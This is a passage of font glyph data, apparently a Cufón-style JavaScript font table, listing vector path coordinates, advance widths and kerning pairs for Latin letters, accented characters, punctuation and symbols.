0,-33,4,-32,25r32,0r0,40r-33,0r0,153r-43,0r0,-153r-23,0r0,-40r21,0v-2,-50,26,-68,78,-66r0,41","w":185},{"d":"9,-97v-4,-86,98,-129,164,-82v17,13,28,31,34,54r-48,0v-20,-48,-110,-33,-104,28v-7,58,89,79,104,26r48,0v-11,44,-45,76,-96,76v-61,0,-100,-40,-102,-102xm59,-280r22,0r30,37r29,-37r23,0r-33,62r-38,0","w":218},{"d":"166,0r-161,0r0,-44r101,-164r-94,0r0,-48r151,0r0,41r-103,168r106,0r0,47xm34,-342r22,0r30,37r29,-37r23,0r-33,62r-38,0","w":171},{"d":"142,-275v5,50,-59,64,-90,38v-9,-8,-14,-21,-15,-38r22,0v0,18,12,25,31,25v20,0,30,-6,31,-25r21,0"},{"d":"22,0r0,-256r50,0r0,256r-50,0xm28,-288r0,-42r38,0r0,42r-38,0","w":93},{"d":"156,0r-130,0r0,-92r-26,19r0,-44r26,-19r0,-120r50,0r0,99r37,-26r0,45r-37,26r0,67r80,0r0,45","w":163,"k":{"\u2039":6,"\u2019":48,"\u2018":46,"\u201d":48,"\u201c":46,"\u0153":6,"\u0152":13,"\u00ab":6,"\u00f8":6,"\u00e6":6,"\u00d8":13,"\u00c5":-13,"y":13,"u":6,"o":6,"e":6,"a":6,"Y":20,"W":20,"V":23,"U":6,"T":13,"O":13,"A":-13,"-":6}},{"d":"99,-218r29,-62r34,0r-44,62r-19,0xm72,-218r-19,0r24,-62r33,0"},{"d":"32,15v20,-1,17,19,25,30v12,0,17,-40,21,-121v4,-99,0,-187,76,-197v34,-5,51,49,12,50v-15,1,-20,-9,-21,-23v0,-5,-2,-7,-5,-7v-12,0,-18,36,-21,108v-4,98,7,197,-76,210v-35,6,-49,-48,-11,-50","w":196},{"d":"38,-280r22,0r30,37r29,-37r23,0r-33,62r-38,0"},{"d":"126,-40v0,-13,12,-25,24,-25v13,0,24,12,24,25v0,13,-11,23,-24,23v-13,0,-24,-10,-24,-23xm45,-122r210,0r0,29r-210,0r0,-29xm126,-174v0,-13,11,-24,24,-24v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24","w":299},{"d":"135,50v1,42,-58,37,-91,26r0,-21v21,5,58,19,64,-5v0,-15,-16,-14,-33,-14r0,-36r16,0r0,17v27,-1,44,8,44,33"},{"d":"92,-205v0,-18,-15,-32,-33,-32v-18,-1,-33,14,-32,32v0,18,14,33,32,33v18,0,33,-15,33,-33xm8,-204v0,-29,23,-54,51,-53v28,0,52,25,52,53v0,28,-24,51,-52,51v-27,0,-51,-22,-51,-51","w":118},{"d":"142,-260v36,-1,60,14,79,34r0,-30r137,0r0,45r-89,0r0,58r89,0r0,45r-89,0r0,63r89,0r0,45r-137,0r0,-29v-20,19,-44,34,-81,33v-83,-2,-130,-55,-130,-135v0,-78,53,-126,132,-129xm221,-130v0,-43,-36,-79,-78,-79v-44,0,-83,36,-81,80v2,47,33,80,80,82v44,2,79,-38,79,-83","w":377},{"d":"22,0r0,-256r50,0r0,256r-50,0xm73,-280r-23,0r-52,-62r39,0","w":93},{"d":"69,-252r29,0r0,97r-29,0r0,-97xm15,-252r29,0r0,97r-29,0r0,-97","w":113},{"d":"75,-275r31,0r0,360r-31,0r0,-360"},{"d":"166,0r-161,0r0,-44r101,-164r-94,0r0,-48r151,0r0,41r-103,168r106,0r0,47","w":171,"k":{"\u201e":-13,"\u201a":-13,"\u2018":6,"\u201c":6,"-":6}},{"d":"72,-127r77,-129r56,0r-82,127r82,129r-56,0xm71,0r-50,0r0,-256r50,0r0,256","w":200,"k":{"\u201e":-11,"\u201a":-11,"\u2039":16,"\u0153":6,"\u0152":13,"\u00ab":16,"\u00f8":6,"\u00e6":6,"\u00d8":13,"y":6,"u":6,"o":6,"e":6,"a":6,"W":6,"T":-7,"O":13,"C":13,"-":18}},{"d":"8,-97v-8,-87,110,-134,165,-73r0,-23r40,0r0,161v17,118,-164,148,-193,42r43,0v23,50,120,28,110,-37v-16,16,-37,27,-66,27v-59,0,-94,-40,-99,-97xm111,-158v-31,0,-59,27,-58,58v0,33,26,59,59,59v29,1,57,-27,57,-57v0,-32,-27,-60,-58,-60","w":231},{"d":"113,-92r0,92r-50,0r0,-92r-73,-164r55,0r44,110r44,-110r55,0","w":177,"k":{"\u201e":33,"\u201a":33,"\u203a":26,"\u2039":40,"\u2019":-13,"\u201d":-13,"\u0153":20,"\u0152":6,"\u00bb":26,"\u00ab":40,"\u00f8":20,"\u00e6":20,"\u00d8":6,"\u00c5":13,"u":20,"o":20,"e":20,"a":20,"O":6,"C":6,"A":13,";":18,":":18,".":41,"-":29,",":41}},{"d":"161,-257r38,0r87,99r-36,0r-70,-70r-70,70r-37,0","w":360},{"d":"110,-155v-32,-1,-55,24,-55,57v0,36,20,58,55,58v34,0,54,-25,54,-59v1,-32,-23,-56,-54,-56xm109,5v-62,0,-101,-42,-101,-103v0,-60,41,-101,100,-101v61,0,103,40,103,100v0,64,-40,104,-102,104","w":219,"k":{"\u2018":6,"\u201c":6,"x":6,".":6,"-":-7,",":6}},{"d":"21,0r0,-256r138,0r0,45r-88,0r0,58r88,0r0,45r-88,0r0,108r-50,0","w":173,"k":{"\u201e":66,"\u201a":66,"\u2039":6,"\u2019":-7,"\u201d":-7,"\u00ab":6,"\u00c5":10,"u":6,"r":6,"i":6,"A":10,";":15,":":15,".":58,",":58}},{"d":"104,5v-59,-3,-83,-32,-83,-99r0,-162r50,0r0,148v1,37,2,61,33,61v31,0,31,-23,32,-61r0,-148r50,0v-7,108,35,266,-82,261xm117,-289r0,-41r36,0r0,41r-36,0xm55,-289r0,-41r36,0r0,41r-36,0","w":207},{"d":"65,-216r0,248r33,0r0,40r-78,0r0,-328r78,0r0,40r-33,0","w":106},{"d":"70,0r-49,0r0,-256r48,0r106,164r0,-164r49,0r0,256r-47,0r-107,-168r0,168","w":245},{"d":"-5,-256r51,0r42,166r46,-166r35,0r46,166r42,-166r51,0r-74,256r-40,0r-42,-160r-44,160r-39,0","w":303,"k":{"\u201e":26,"\u201a":26,"\u203a":20,"\u2039":20,"\u2019":-7,"\u201d":-7,"\u0153":11,"\u00bb":20,"\u00ab":20,"\u00f8":11,"\u00e6":11,"\u00c5":6,"u":6,"r":6,"o":11,"i":-7,"e":11,"a":11,"A":6,";":15,":":15,".":31,"-":21,",":31}},{"d":"0,55r180,0r0,30r-180,0r0,-30"},{"d":"107,-117r0,41r-91,0r0,-41r91,0","w":122,"k":{"\u0153":-7,"\u0152":-13,"\u00f8":-7,"\u00d8":-13,"\u00c6":-10,"\u00c5":-10,"o":-7,"Y":24,"X":13,"W":20,"V":21,"T":20,"O":-13,"J":-20,"G":-13,"C":-7,"A":-10}},{"d":"128,-176v0,-30,-24,-37,-57,-35r0,69v32,2,57,-5,57,-34xm180,-179v0,55,-45,87,-109,81r0,98r-50,0r0,-256r64,0v62,-3,95,24,95,77","w":185,"k":{"\u201e":79,"\u201a":79,"\u203a":6,"\u2039":13,"\u2019":-8,"\u2018":-13,"\u201d":-8,"\u201c":-13,"\u0153":11,"\u00bb":6,"\u00ab":13,"\u00f8":11,"\u00e6":11,"\u00c5":15,"s":6,"r":6,"o":11,"n":6,"i":6,"e":11,"a":11,"A":15,";":6,":":6,".":79,"-":15,",":79}},{"d":"137,-101r-30,-83r-31,83r61,0xm58,-54r-20,54r-51,0r99,-256r43,0r98,256r-54,0r-20,-54r-95,0xm56,-280r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0","w":216},{"d":"110,-154v-30,0,-56,26,-56,56v0,30,25,57,56,57v28,0,54,-26,54,-55v0,-31,-25,-58,-54,-58xm108,-198v29,0,48,11,60,28r0,-23r44,0r0,193r-43,0r0,-24v-10,19,-30,28,-60,28v-57,0,-103,-46,-101,-102v2,-60,38,-98,100,-100xm64,-218r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0","w":231},{"d":"63,-128v0,83,123,113,151,35r-101,0r0,-43r160,0v4,86,-53,136,-131,141v-119,8,-169,-151,-91,-229v36,-36,118,-50,165,-17v20,13,35,33,46,59r-60,0v-13,-16,-33,-28,-60,-28v-44,-1,-79,38,-79,82","w":283,"k":{"\u201e":6,"\u201a":6,"Y":13,"T":6,"-":-8}},{"d":"42,-216r-34,0r0,-40r79,0r0,328r-79,0r0,-40r34,0r0,-248","w":106},{"d":"122,0r0,-193r44,0r0,193r-44,0xm166,-213r-44,0r0,-43r44,0r0,43xm105,-218v-21,0,-33,4,-32,25r32,0r0,40r-33,0r0,153r-43,0r0,-153r-23,0r0,-40r21,0v-2,-50,26,-68,78,-66r0,41","w":185},{"d":"8,-97v-8,-87,110,-134,165,-73r0,-23r40,0r0,161v17,118,-164,148,-193,42r43,0v23,50,120,28,110,-37v-16,16,-37,27,-66,27v-59,0,-94,-40,-99,-97xm111,-158v-31,0,-59,27,-58,58v0,33,26,59,59,59v29,1,57,-27,57,-57v0,-32,-27,-60,-58,-60xm168,-275v5,50,-59,64,-90,38v-9,-8,-14,-21,-15,-38r22,0v0,18,12,25,31,25v20,0,30,-6,31,-25r21,0","w":231},{"d":"104,5v-52,-3,-85,-34,-84,-87v15,2,37,-4,48,2v0,22,14,39,35,39v24,0,39,-19,39,-44v1,-30,-23,-43,-55,-39r0,-43v22,3,39,-4,38,-26v0,-15,-8,-23,-22,-23v-14,0,-19,10,-20,24r-45,0v0,-40,28,-69,68,-69v57,0,88,83,39,112v74,26,46,160,-41,154","w":209},{"d":"200,0v-33,7,-73,3,-71,-33v1,-22,15,-92,21,-123r-47,0r-30,156r-40,0r30,-156v-20,-2,-27,6,-29,23r-31,0v8,-41,15,-57,60,-57r168,0r-7,34r-34,0r-20,110v-3,20,19,20,35,16","w":240},{"d":"162,-118v-8,-51,-96,-52,-105,0r105,0xm55,-82v0,49,81,59,100,20r48,0v-14,38,-45,68,-93,67v-61,-2,-101,-40,-101,-102v0,-60,40,-102,99,-102v65,0,105,43,102,117r-155,0xm83,-218r36,-62r39,0r-52,62r-23,0","w":218},{"d":"110,-154v-69,-2,-41,92,-47,154r-45,0r0,-193r42,0r0,22v13,-15,26,-24,50,-25r0,42","w":108,"k":{"\u201e":15,"\u201a":15,"\uf002":-13,"\uf001":-13,"\u2019":-25,"\u2018":-20,"\u201d":-25,"\u201c":-20,"z":-7,"y":-13,"x":-13,"w":-13,"v":-13,"u":-7,"t":-13,"r":-7,"n":-7,"m":-7,"h":-7,"f":-13,".":23,",":23}},{"d":"253,-207r0,33r-164,67r164,67r0,32r-207,-85r0,-28","w":299},{"d":"61,47v1,-23,16,-33,33,-47r16,0v-12,11,-22,19,-23,37v-1,18,16,15,32,15r0,27v-32,1,-60,-2,-58,-32"},{"d":"112,-151v85,20,55,156,-29,156v-47,0,-78,-35,-77,-84r46,-1v-2,23,10,40,30,40v20,0,33,-14,33,-34v0,-38,-70,-39,-87,-64v-33,-48,-2,-123,59,-123v44,0,67,31,70,74v-14,-2,-35,4,-45,-2v0,-16,-11,-27,-27,-28v-24,-1,-35,30,-20,47v4,7,34,15,47,19xm34,-342r22,0r30,37r29,-37r23,0r-33,62r-38,0","w":172},{"d":"105,-218v-13,0,-24,11,-24,26v0,14,9,25,23,25v17,0,24,-10,24,-25v0,-15,-8,-26,-23,-26xm103,-113v-21,0,-34,16,-34,37v0,20,16,37,35,37v20,0,36,-16,36,-37v0,-22,-15,-37,-37,-37xm19,-78v0,-34,17,-50,41,-65v-56,-29,-21,-125,44,-118v65,-8,103,90,44,118v25,12,42,31,42,65v1,48,-37,83,-87,83v-47,0,-85,-36,-84,-83","w":209},{"d":"77,-70r-45,0r0,-186r45,0r0,186xm77,0r-45,0r0,-48r45,0r0,48","w":110},{"d":"75,-72r31,0r0,134r-31,0r0,-134xm75,-252r31,0r0,134r-31,0r0,-134"},{"d":"247,-108v0,-33,-37,-52,-60,-28v-7,8,-16,20,-24,38v12,37,84,40,84,-10xm53,-107v0,33,37,52,60,28v7,-8,16,-19,24,-37v-11,-37,-84,-40,-84,9xm209,-37v-31,0,-41,-20,-57,-46v-14,25,-27,46,-57,46v-34,0,-58,-33,-58,-70v0,-38,20,-71,54,-71v31,0,41,21,57,46v14,-26,27,-45,59,-46v32,-1,56,35,56,70v0,38,-20,71,-54,71","w":299},{"d":"65,-115v53,-17,105,8,138,37v43,-45,4,-133,-61,-133v-47,0,-91,47,-77,96xm174,-54v-27,-18,-56,-33,-97,-28v17,27,59,45,97,28xm278,4v-29,1,-48,-7,-68,-18v-18,12,-41,19,-70,19v-119,0,-169,-154,-89,-229v23,-21,50,-37,91,-37v81,0,133,53,133,134v0,37,-12,64,-32,84v10,5,20,7,35,6r0,41","w":283},{"d":"20,0r0,-256r44,0r0,256r-44,0","w":84},{"d":"110,-155v-32,-1,-55,24,-55,57v0,36,20,58,55,58v34,0,54,-25,54,-59v1,-32,-23,-56,-54,-56xm109,5v-62,0,-101,-42,-101,-103v0,-60,41,-101,100,-101v61,0,103,40,103,100v0,64,-40,104,-102,104xm123,-227r0,-41r36,0r0,41r-36,0xm61,-227r0,-41r36,0r0,41r-36,0","w":219},{"d":"45,-86r210,0r0,29r-210,0r0,-29xm45,-158r210,0r0,29r-210,0r0,-29","w":299},{"d":"32,20v13,-1,15,-7,15,-20r-15,0r0,-48r45,0v0,46,8,97,-44,94xm77,-137r-45,0r0,-48r45,0r0,48","w":110},{"d":"30,20v11,-2,15,-7,15,-20r-15,0r0,-48r45,0v0,46,7,97,-45,94r0,-26","w":104},{"d":"182,-160v0,-25,-28,-24,-54,-24r0,46v26,0,54,2,54,-22xm215,-164v0,22,-14,36,-33,40r33,66r-35,0r-29,-61r-23,0r0,61r-31,0r0,-146v51,1,117,-9,118,40xm261,-127v0,-67,-44,-112,-111,-112v-67,0,-111,46,-111,111v0,65,44,110,109,110v67,0,113,-42,113,-109xm20,-128v0,-77,51,-130,130,-130v79,0,130,52,130,130v0,78,-53,130,-130,130v-77,0,-130,-53,-130,-130","w":299},{"d":"110,-154v-30,0,-56,26,-56,56v0,30,25,57,56,57v28,0,54,-26,54,-55v0,-31,-25,-58,-54,-58xm108,-198v29,0,48,11,60,28r0,-23r44,0r0,193r-43,0r0,-24v-10,19,-30,28,-60,28v-57,0,-103,-46,-101,-102v2,-60,38,-98,100,-100xm97,-265v18,0,49,19,54,-5r18,0v-4,41,-37,45,-73,32v-9,0,-13,4,-15,12r-18,0v3,-22,13,-39,34,-39","w":231},{"d":"162,-118v-8,-51,-96,-52,-105,0r105,0xm55,-82v0,49,81,59,100,20r48,0v-14,38,-45,68,-93,67v-61,-2,-101,-40,-101,-102v0,-60,40,-102,99,-102v65,0,105,43,102,117r-155,0xm122,-227r0,-41r36,0r0,41r-36,0xm60,-227r0,-41r36,0r0,41r-36,0","w":218},{"d":"205,-284v6,37,-31,78,-58,68v-2,-36,27,-63,58,-68xm224,-130v0,31,18,49,41,59v-21,43,-30,70,-72,77v-9,1,-35,-13,-45,-11v-9,-2,-37,13,-45,11v-54,-12,-79,-76,-83,-136v-3,-49,32,-86,79,-86v13,0,39,12,49,12v20,-7,58,-21,83,-6v10,6,19,12,28,22v-20,14,-35,28,-35,58","w":284},{"d":"91,0r-51,0r95,-211r-100,0r0,-45r147,0r0,48","w":209},{"d":"46,-207r207,86r0,28r-207,85r0,-32r165,-67r-165,-67r0,-33","w":299},{"d":"-4,-193r48,0r47,135r52,-135r47,0r-105,256r-46,0r27,-68","w":184,"k":{"\u201e":33,"\u201a":33,"\u2019":-7,"\u2018":-13,"\u201d":-7,"\u201c":-13,".":31,"-":6,",":31}},{"d":"150,-201v-1,28,-18,46,-39,59r37,34r23,-62r46,0r-37,89r59,51r-31,34r-51,-47v-14,27,-36,47,-72,48v-41,1,-78,-35,-76,-77v2,-36,19,-55,45,-73v-48,-32,-26,-116,37,-116v31,0,60,30,59,60xm81,-112v-34,10,-39,73,3,73v20,0,32,-16,40,-33xm89,-220v-28,2,-26,42,-2,51v25,-6,33,-48,2,-51","w":234},{"d":"173,-182v0,47,-62,62,-60,112r-45,0v-2,-48,36,-65,53,-97v5,-27,-6,-50,-32,-49v-18,0,-31,18,-31,38r-47,0v-1,-47,34,-83,81,-83v47,0,81,34,81,79xm68,0r0,-48r45,0r0,48r-45,0","w":183},{"d":"115,-38v30,0,53,-26,53,-56v0,-31,-23,-56,-54,-56v-30,0,-55,26,-55,56v0,31,27,56,56,56xm14,-95v0,-77,97,-130,156,-79r0,-34r-51,0r0,-26r51,0r0,-22r45,0r0,22r29,0r0,26r-29,0r0,208r-45,0r0,-15v-60,49,-156,-1,-156,-80","w":236},{"d":"137,-101r-30,-83r-31,83r61,0xm58,-54r-20,54r-51,0r99,-256r43,0r98,256r-54,0r-20,-54r-95,0","w":216,"k":{"\u201e":-27,"\u201a":-27,"\u2039":13,"\u2019":33,"\u2018":36,"\u201d":33,"\u201c":36,"\u0152":6,"\u00ab":13,"\u00d8":6,"Y":13,"W":6,"V":6,"T":15,"S":-10,"Q":6,"O":6,"G":6,"C":6,"A":-20,";":-7,":":-7,".":-7,",":-7}},{"d":"272,-46r0,-59r-42,59r42,0xm300,0r-28,0r0,-22r-70,0r0,-24r69,-97r29,0r0,97r14,0r0,24r-14,0r0,22xm226,-261r26,0r-154,266r-26,0xm66,-110v-33,0,-53,-18,-53,-49v9,1,23,-2,30,1v0,14,9,22,22,23v13,1,24,-11,24,-25v0,-18,-14,-23,-34,-22r0,-24v26,7,32,-28,10,-28v-8,0,-12,6,-13,14r-28,0v0,-24,19,-38,43,-39v34,-2,56,47,24,63v47,14,29,86,-25,86","w":323},{"d":"22,0r0,-256r50,0r0,256r-50,0xm21,-280r36,-62r39,0r-52,62r-23,0","w":93},{"d":"105,-215v-55,-3,-40,73,-40,125v0,31,10,48,39,49v57,2,36,-77,40,-129v2,-31,-13,-44,-39,-45xm104,5v-56,0,-89,-32,-89,-95r0,-76v0,-64,31,-95,90,-95v56,0,89,32,89,95r0,76v0,64,-31,95,-90,95","w":209},{"d":"71,0r-50,0r0,-256r67,0r65,186r64,-186r67,0r0,256r-50,0r2,-186r-65,186r-37,0r-65,-186","w":304},{"d":"77,-137r-45,0r0,-48r45,0r0,48xm77,0r-45,0r0,-48r45,0r0,48","w":110},{"d":"81,-62r-40,62r-50,0r66,-100r-58,-93r50,0r34,55r34,-55r53,0r-62,91r62,102r-51,0","w":164,"k":{"\u0153":6,"\u00f8":6,"o":6,"e":6,"c":6}},{"d":"70,0r-49,0r0,-256r48,0r106,164r0,-164r49,0r0,256r-47,0r-107,-168r0,168xm104,-327v18,0,49,19,54,-5r18,0v-4,41,-37,45,-73,32v-9,0,-13,4,-15,12r-18,0v3,-22,13,-39,34,-39","w":245},{"d":"143,-209v-42,0,-81,35,-80,79v2,50,32,81,79,83v44,2,79,-38,79,-83v0,-43,-36,-79,-78,-79xm142,5v-81,0,-132,-53,-132,-133v0,-81,53,-133,133,-133v77,0,130,53,130,131v0,81,-51,135,-131,135xm116,-280r36,-62r39,0r-52,62r-23,0","w":283},{"d":"110,-155v-32,-1,-55,24,-55,57v0,36,20,58,55,58v34,0,54,-25,54,-59v1,-32,-23,-56,-54,-56xm109,5v-62,0,-101,-42,-101,-103v0,-60,41,-101,100,-101v61,0,103,40,103,100v0,64,-40,104,-102,104xm136,-218r-23,0r-52,-62r39,0","w":219},{"d":"92,78v-46,-16,-75,-49,-75,-108v0,-68,-12,-149,19,-191v13,-18,31,-31,56,-40r0,49v-44,23,-29,108,-29,171v0,39,6,54,29,70r0,49","w":106},{"w":104},{"d":"143,-209v-42,0,-81,35,-80,79v2,50,32,81,79,83v44,2,79,-38,79,-83v0,-43,-36,-79,-78,-79xm142,5v-81,0,-132,-53,-132,-133v0,-81,53,-133,133,-133v77,0,130,53,130,131v0,81,-51,135,-131,135xm155,-289r0,-41r36,0r0,41r-36,0xm93,-289r0,-41r36,0r0,41r-36,0","w":283},{"d":"116,-218r-23,0r-52,-62r39,0"},{"d":"70,-258v51,0,71,56,30,89r-48,39r72,0r0,28r-111,0r0,-29v24,-22,54,-40,74,-66v12,-15,0,-35,-18,-34v-15,1,-22,11,-21,26v-10,-1,-25,2,-33,-1v0,-31,22,-52,55,-52","w":137},{"d":"128,-131v0,-30,-24,-37,-57,-35r0,69v33,2,57,-5,57,-34xm180,-134v0,55,-45,87,-109,81r0,53r-50,0r0,-256r50,0r0,45v69,-5,109,19,109,77","w":185},{"d":"128,-81r0,-107r-68,107r68,0xm172,0r-44,0r0,-39r-113,0r0,-42r111,-175r46,0r0,175r21,0r0,42r-21,0r0,39","w":209},{"d":"113,-40v33,0,55,-25,55,-58v0,-30,-24,-56,-53,-56v-32,0,-58,26,-58,57v-1,30,26,57,56,57xm110,-198v26,0,44,8,60,21r0,-16r45,0r0,256r-45,0r0,-78v-62,48,-165,0,-160,-81v4,-58,37,-101,100,-102","w":231},{"d":"272,-46r0,-59r-42,59r42,0xm300,0r-28,0r0,-22r-70,0r0,-24r69,-97r29,0r0,97r14,0r0,24r-14,0r0,22xm226,-261r26,0r-154,266r-26,0xm86,-113r-30,0r0,-122r-28,0r0,-21r58,0r0,143","w":323},{"d":"77,-198v-2,-56,24,-63,77,-62r0,32v-81,-21,-4,130,-77,135v42,4,36,51,36,97v0,32,9,39,41,38r0,31v-52,1,-77,-6,-77,-61v0,-48,7,-98,-49,-90r0,-31v54,8,51,-40,49,-89"},{"d":"-3,19v23,-1,24,-8,24,-35r0,-177r44,0r0,186v2,57,-16,72,-68,69r0,-43xm65,-213r-44,0r0,-43r44,0r0,43","w":88},{"d":"143,-87v0,-43,-60,-60,-77,-26r-42,-10r24,-133r121,0r0,44r-88,0r-8,44v55,-31,120,22,120,81v0,78,-95,120,-152,69v-17,-16,-27,-37,-29,-62r48,0v2,21,20,39,42,39v24,1,41,-22,41,-46","w":209},{"d":"20,0r0,-193r44,0r0,193r-44,0xm16,-218r36,-62r39,0r-52,62r-23,0","w":84},{"d":"69,41r0,-188r-59,0r0,-33r59,0r0,-76r42,0r0,76r59,0r0,33r-59,0r0,188r-42,0"},{"d":"45,-152r210,0r0,89r-29,0r0,-59r-181,0r0,-30","w":299},{"d":"46,-31r209,0r0,29r-209,0r0,-29xm46,-215r208,69r0,25r-208,69r0,-31r156,-51r-156,-50r0,-31","w":299},{"d":"104,-126v23,0,43,-20,43,-43v1,-25,-19,-47,-42,-46v-24,0,-43,20,-42,45v0,25,18,43,41,44xm105,-261v65,0,108,61,83,126v-16,43,-59,94,-85,135r-52,0r58,-87v-55,13,-98,-34,-95,-84v3,-53,36,-90,91,-90","w":209},{"d":"113,-92r0,92r-50,0r0,-92r-73,-164r55,0r44,110r44,-110r55,0xm63,-280r36,-62r39,0r-52,62r-23,0","w":177},{"d":"180,-114r0,34r-180,0r0,-34r180,0"},{"d":"63,-128v0,83,123,113,151,35r-101,0r0,-43r160,0v4,86,-53,136,-131,141v-119,8,-169,-151,-91,-229v36,-36,118,-50,165,-17v20,13,35,33,46,59r-60,0v-13,-16,-33,-28,-60,-28v-44,-1,-79,38,-79,82xm194,-337v5,50,-59,64,-90,38v-9,-8,-14,-21,-15,-38r22,0v0,18,12,25,31,25v20,0,30,-6,31,-25r21,0","w":283},{"d":"144,-175v0,-38,-33,-40,-73,-39r0,83v41,1,73,-7,73,-44xm194,-176v0,41,-26,70,-61,77r64,99r-60,0r-66,-119r0,119r-50,0r0,-256v89,-3,173,-4,173,80","w":204,"k":{"\u203a":6,"\u2039":6,"\u0153":6,"\u00bb":6,"\u00ab":6,"\u00f8":6,"\u00e6":6,"u":6,"o":6,"e":6,"a":6,"-":10}},{"d":"11,-130v-2,-103,113,-164,202,-111v20,12,36,34,49,61r-61,0v-13,-18,-32,-30,-61,-30v-47,0,-75,34,-77,81v-1,44,33,84,77,83v27,0,47,-11,59,-27r61,0v-22,47,-57,78,-119,78v-79,0,-127,-53,-130,-135xm115,-280r36,-62r39,0r-52,62r-23,0","w":270},{"d":"-4,-193r48,0r47,135r52,-135r47,0r-105,256r-46,0r27,-68xm105,-227r0,-41r36,0r0,41r-36,0xm43,-227r0,-41r36,0r0,41r-36,0","w":184},{"d":"79,-135v-37,0,-63,-26,-63,-63v0,-37,26,-63,63,-63v37,0,63,26,63,63v0,37,-26,63,-63,63xm79,-227v-16,0,-30,14,-30,29v0,15,14,29,30,29v16,0,29,-13,29,-29v0,-16,-13,-29,-29,-29xm212,-261r29,0r-137,266r-28,0xm237,-88v-15,-1,-30,15,-30,30v0,15,15,31,30,30v15,0,29,-15,29,-30v0,-15,-14,-30,-29,-30xm237,5v-38,0,-64,-25,-64,-63v0,-37,26,-63,64,-63v37,0,63,26,63,63v0,38,-26,63,-63,63","w":315},{"d":"120,0r-36,0r-92,-256r54,0r56,171r56,-171r53,0","w":204,"k":{"\u201e":40,"\u201a":40,"\u203a":20,"\u2039":40,"\u2019":-10,"\u201d":-10,"\u0153":20,"\u0152":6,"\u00bb":20,"\u00ab":40,"\u00f8":20,"\u00e6":20,"\u00d8":6,"\u00c5":6,"y":6,"u":16,"o":20,"e":20,"a":20,"O":6,"A":6,";":18,":":18,".":46,"-":23,",":46}},{"d":"43,-41v0,-63,16,-150,-29,-171r0,-49v46,16,76,48,76,107v0,68,12,150,-19,192v-13,18,-32,31,-57,40r0,-49v24,-15,29,-30,29,-70","w":106},{"d":"10,-199v0,-73,87,-61,160,-61r0,17r-20,0r0,243r-23,0r0,-243r-29,0r0,243r-23,0r0,-138v-37,-1,-65,-23,-65,-61"},{"d":"137,-101r-30,-83r-31,83r61,0xm58,-54r-20,54r-51,0r99,-256r43,0r98,256r-54,0r-20,-54r-95,0xm89,-327v18,0,49,19,54,-5r18,0v-4,41,-37,45,-73,32v-9,0,-13,4,-15,12r-18,0v3,-22,13,-39,34,-39","w":216},{"d":"110,-154v-30,0,-56,26,-56,56v0,30,25,57,56,57v28,0,54,-26,54,-55v0,-31,-25,-58,-54,-58xm108,-198v29,0,48,11,60,28r0,-23r44,0r0,193r-43,0r0,-24v-10,19,-30,28,-60,28v-57,0,-103,-46,-101,-102v2,-60,38,-98,100,-100xm90,-218r36,-62r39,0r-52,62r-23,0","w":231},{"d":"136,-57v5,55,-75,83,-109,43v-11,-12,-18,-29,-19,-50v13,2,32,-4,41,2v-4,32,46,40,46,8v0,-44,-78,-25,-78,-86v0,-49,65,-77,99,-43v10,10,16,23,17,41v-13,-1,-30,2,-41,-1v0,-12,-6,-20,-18,-19v-10,0,-17,8,-17,18v13,33,88,31,79,87","w":146},{"d":"11,-130v-2,-103,113,-164,202,-111v20,12,36,34,49,61r-61,0v-13,-18,-32,-30,-61,-30v-47,0,-75,34,-77,81v-1,44,33,84,77,83v27,0,47,-11,59,-27r61,0v-22,47,-57,78,-119,78v-79,0,-127,-53,-130,-135xm186,50v1,42,-58,37,-91,26r0,-21v21,5,58,19,64,-5v0,-15,-16,-14,-33,-14r0,-36r16,0r0,17v27,-1,44,8,44,33","w":270},{"d":"90,-102r-31,0r0,-131r-30,0r0,-23r61,0r0,154","w":137},{"d":"106,-153v-62,0,-37,94,-42,153r-44,0r0,-193r44,0r0,22v13,-16,26,-26,52,-26v92,-3,74,106,75,197r-45,0v-6,-58,21,-153,-40,-153xm86,-265v18,0,49,19,54,-5r18,0v-4,41,-37,45,-73,32v-9,0,-13,4,-15,12r-18,0v3,-22,13,-39,34,-39","w":209},{"d":"110,-155v-32,-1,-55,24,-55,57v0,36,20,58,55,58v34,0,54,-25,54,-59v1,-32,-23,-56,-54,-56xm109,5v-62,0,-101,-42,-101,-103v0,-60,41,-101,100,-101v61,0,103,40,103,100v0,64,-40,104,-102,104xm91,-265v18,0,49,19,54,-5r18,0v-4,41,-37,45,-73,32v-9,0,-13,4,-15,12r-18,0v3,-22,13,-39,34,-39","w":219},{"d":"20,0r0,-193r44,0r0,193r-44,0xm68,-218r-23,0r-52,-62r39,0","w":84},{"d":"22,0r0,-256r50,0r0,256r-50,0xm60,-289r0,-41r36,0r0,41r-36,0xm-2,-289r0,-41r36,0r0,41r-36,0","w":93},{"d":"82,-228v-22,0,-41,18,-41,39v0,22,19,40,42,40v21,0,40,-19,40,-39v0,-21,-20,-40,-41,-40xm6,-189v-5,-61,85,-95,120,-50r0,-17r33,0r0,135r-32,0r0,-16v-35,45,-129,6,-121,-52","w":173},{"d":"137,-101r-30,-83r-31,83r61,0xm58,-54r-20,54r-51,0r99,-256r43,0r98,256r-54,0r-20,-54r-95,0xm121,-289r0,-41r36,0r0,41r-36,0xm59,-289r0,-41r36,0r0,41r-36,0","w":216},{"d":"69,-45v21,-2,22,-19,22,-46r0,-165r51,0v-9,102,37,261,-72,261v-46,0,-70,-27,-70,-74v16,1,36,-2,50,1v0,13,6,24,19,23","w":162,"k":{"\u201e":13,"\u201a":13,"-":6}},{"d":"32,-186r45,0r0,186r-45,0r0,-186xm32,-256r45,0r0,49r-45,0r0,-49","w":110},{"d":"9,-97v-4,-86,98,-129,164,-82v17,13,28,31,34,54r-48,0v-20,-48,-110,-33,-104,28v-7,58,89,79,104,26r48,0v-11,44,-45,76,-96,76v-61,0,-100,-40,-102,-102xm85,-218r36,-62r39,0r-52,62r-23,0","w":218},{"d":"27,-153r35,0r43,56r-43,57r-35,0r43,-57","w":127,"k":{"\u00c5":13,"Y":40,"X":20,"W":20,"V":40,"T":33,"J":-13,"A":13}},{"d":"117,-183v0,-25,-19,-29,-47,-28r0,58v28,1,47,-5,47,-30xm130,-76v1,-31,-26,-38,-60,-36r0,67v32,1,60,-2,60,-31xm179,-78v2,79,-73,82,-157,78r0,-256v74,-4,143,1,143,68v0,25,-9,41,-26,50v24,7,39,30,40,60","w":185,"k":{"\u2039":-7,"\u2019":6,"\u201d":6,"\u00ab":-7,"-":-10}},{"d":"64,